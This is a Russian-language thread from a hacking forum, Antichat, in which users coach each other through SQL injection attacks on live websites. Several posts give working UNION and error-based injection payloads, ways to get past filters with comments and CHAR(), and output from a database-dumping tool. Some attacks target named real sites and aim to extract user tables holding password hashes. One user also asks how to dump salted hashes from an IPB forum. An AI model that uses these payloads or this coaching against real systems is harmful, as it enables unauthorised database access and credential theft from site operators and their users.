17.09.2007, 16:47
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
Сообщение от cheb
а че делать если в sql inj нету выводимых полей. как можно до чего-то докопатся ?
Почитай статьи по blind sql-inj, на сколько я помню, в любой версии можно по буквам подобрать колонки\таблицы и их содержимое.
добавлено:
Через where+...+like+... можно в любой версии 
|
|
|
17.09.2007, 20:05
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Хм, у меня такая трабла, при инъекции в mssql при запросе с кавычкой выводится стандартная ошибка
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '5F42D5B0', 3, 1'.
/software/product.asp, line 62
Но при запросе, допустим
'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
Вылазает ошибка
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.
/software/product.asp, line 62
Почему вылазает эта ошибка и как ее обойти ? |
|
|
|
17.09.2007, 20:21
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
замени + на /**/ или попробуй вместо одинарной кавычки поставить двойную
__________________
Карфаген должен быть разрушен...
|
|
|
|
17.09.2007, 20:22
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами:
10153766
Репутация:
2565
|
|
Почему вылазает эта ошибка и как ее обойти ?
Он же те явно пишет типа незакрытая кавычка в запросе:
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '5F42D5B0', 3, 1'.
Следовательно инъекцию надо проводить без кавычки, например подставлять -1 и дальше свой запрос, т.е. вызвать не существующее значение...
-1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
правда иногда работает и так, т.е. используешь значение и кавычку...
-1'+or+1.......
Последний раз редактировалось [53x]Shadow; 17.09.2007 в 20:25..
|
|
|
|
17.09.2007, 21:26
|
|
Новичок
Регистрация: 17.10.2006
Сообщений: 23
С нами:
10297441
Репутация:
104
|
|
подскажите, если не затруднит.
Возможно ли при активной КСС перехватить реферера или квери стринг в https, или браузер обязательно их почистит? я бы сам поэксперементировал, но лень 
Последний раз редактировалось cRiLaZ; 17.09.2007 в 21:55..
|
|
|
|
17.09.2007, 21:29
|
|
Участник форума
Регистрация: 11.08.2007
Сообщений: 220
С нами:
9868553
Репутация:
732
|
|
пожалуйста, скажите как слить базу солёных хешей на Ipb форуме?
|
|
|
|
17.09.2007, 22:44
|
|
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
С нами:
10356158
Репутация:
16
|
|
прива я решил сдампить базу испольщовал прогу ачата )))
вот что он мне вывел
=====_Databases_Dumper_MSSQL(MySQL-5.*)_=====
Mon Sep 17 21:36:34 2007
*URL:____________http://www.site.ru/?pageId=1&subId=1
UNION-Subquery:_UNION
Algoritm:_______only Tables
Evristic:_______ON
Brut:___________OFF
NOT:____________NOT IN
HEX:____________OFF
Space:__________%20
POST-GET:_______GET
Time:___________0
User-Agent:_____useragent.txt
Proxy:__________proxy.txt
Log:____________log_basedump.txt
=====_Databases_Dumper_MSSQL(MySQL-5.*)_=====
GO!
Start evristic detection. Please, WAIT...
Detect MySQL
OK! Find 1 column.
Use mysql concat-tehnology:
First Answer: blahhh
Second Answer: hhhalb
Sorry, Work Column not detect =( EXIT
запрос был таким
C:\public>perl.exe mssql_base_dump_111.pl -u "http://site.ru/?pageId=1&s
ubId=1'" -M MySQL -t Cart
очень прошу помоч...
|
|
|
|
18.09.2007, 07:05
|
|
Новичок
Регистрация: 16.09.2007
Сообщений: 25
С нами:
9816424
Репутация:
62
|
|
Calcutta, что бы твой запрос выполнился нужно чтобы в предыдущем была ошибка. Вот так, например
Код:
http://la2.acrossworld.ru/index.php?act=18&rlvl=7&r_rec_id=-1+union+select+1,2,concat_ws(0x3a,table_name,column_name),4,5,6,7,8+from+information_schema.columns
и переберай таблички )
|
|
|
|
18.09.2007, 12:37
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Следовательно инъекцию надо проводить без кавычки, например подставлять -1 и дальше свой запрос, т.е. вызвать не существующее значение...
-1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
правда иногда работает и так, т.е. используешь значение и кавычку...
-1'+or+1.......
[53x]Shadow , Scipio пасиб, но я все это пробовал, в ответ получаю ошибку
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type varchar to uniqueidentifier.
/software/product.asp, line 62
Что она означает ?
|
|
|
|
18.09.2007, 13:58
|
|
Новичок
Регистрация: 02.06.2006
Сообщений: 20
С нами:
10494866
Репутация:
13
|
|
Народ, сорри что снова задаю тотже вопрос что и парой страниц ранее,
безусловно помощь мне оказали, но доконца осуществить задуманное мне так и не удалось...
Вкраце повторюсь и опишу проблему..
при помощи такого запроса удалось выдрать таблички
_http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,table_name ,5+from+information_schema.tables+limit+73,1/
их 73 штуки..
из них лиш одна пахожа на ту, где хранятся логины и хэши
она называется g2_User и идёт 71 по счету...
Кавычки фильтруются, но при помощи CHAR удалось вытащить из этой таблички названия полей таким вот образом:
_http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,column_nam e,5+from+information_schema.columns+where+table_na me=CHAR(103,50,95,85,115,101,114)+limit+6,1/*
поля
g_id
g_userName
g_fullName
g_hashedPassword
g_email
g_language
g_locked
Но далее при попытке вывести данные таким образом:
_http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,4,5+from+g 2_User/*
вылетает сообщение о неверном запросе...
Ктонибудь, подскажите плиз в чём проблема, и как её решить?)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?462065){kind=avatar}
Похожие темы
Комбинированный вид
